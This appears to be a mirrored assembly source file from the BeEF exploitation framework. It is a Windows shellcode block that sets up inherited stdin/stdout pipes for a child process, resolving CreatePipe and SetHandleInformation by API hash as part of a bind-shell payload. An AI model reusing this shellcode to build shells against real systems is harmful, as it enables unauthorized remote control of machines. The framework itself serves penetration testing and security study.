CoCalc -- block

GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/beefbind/shellcode_sources/windows/src/block_pipes.asm
¹¹⁵⁴ views
1
;-----------------------------------------------------------------------------;
2
; Author: Ty Miller @ Threat Intelligence
3
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
4
; Version: 1.0 (2nd December 2011)
5
;-----------------------------------------------------------------------------;
6
[BITS 32]
7

8
; Input: EBP is api_call
9
; Output:
10
;       esp+00	child stdin  read  file descriptor (inherited)
11
;       esp+04	child stdin  write file descriptor (not inherited)
12
;       esp+08	child stdout read  file descriptor (not inherited)
13
;       esp+12	child stdout write file descriptor (inherited)
14
;       esp+16	lpPipeAttributes structure (not used after block - 12 bytes)
15
; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes
16

17
  push 1		 ; create lpPipeAtrributes structure on stack so pipe handles are inherited
18
  push 0
19
  push 0x0C
20

21
create_pipe_stdout:
22
  push 0		 ; allocate space on stack for child stdout file descriptor
23
  mov ebx, esp		 ; save location of where the child stdout Write file descriptor will be
24
  push 0		 ; allocate space on stack for child stdout file descriptor
25
  mov ecx, esp		 ; save location of where the child stdout Read file descriptor will be
26

27
  push 0                 ; nSize
28
  lea edi,[esp+12]	 ; lpPipeAttributes - inherited
29
  push edi
30
  push ebx               ; stdout write file descriptor
31
  push ecx               ; stdout read file descriptor
32
  push 0x0EAFCF3E        ; hash ( "kernel.dll", "CreatePipe" )
33
  call ebp               ; CreatePipe( Read, Write, 0, 0 )
34

35
create_pipe_stdin:
36
  push 0		; allocate space on stack for child stdout file descriptor
37
  mov ebx, esp		; save location of where the child stdout Write file descriptor will be
38
  push 0		; allocate space on stack for child stdout file descriptor
39
  mov ecx, esp		; save location of where the child stdout Read file descriptor will be
40

41
  push 0                 ; nSize
42
  lea edi,[esp+20]	 ; lpPipeAttributes - inherited
43
  push edi
44
  push ebx               ; stdout write file descriptor
45
  push ecx               ; stdout read file descriptor
46
  push 0x0EAFCF3E        ; hash ( "kernel.dll", "CreatePipe" )
47
  call ebp               ; CreatePipe( Read, Write, 0, 0 )
48

49
no_inherit_read_handle:	 ; ensure read and write handles to child proc pipes for are not inherited
50
  mov ebx,[esp+8] 
51
  push 0
52
  push 1
53
  push ebx		 ; hChildStdoutRd is the address we set in the CreatePipe call
54
  push 0x1CD313CA	 ; hash(kernel32.dll, SetHandleInformation)
55
  call ebp		 ; SetHandleInformation
56

57
no_inherit_write_handle:
58
  mov ebx,[esp+4]
59
  push 0
60
  push 1
61
  push ebx		 ; hChildStdinRw is the address we set in the CreatePipe call
62
  push 0x1CD313CA	 ; hash(kernel32.dll, SetHandleInformation)
63
  call ebp	 	 ; SetHandleInformation
64

65

66
Product

Resources

Company
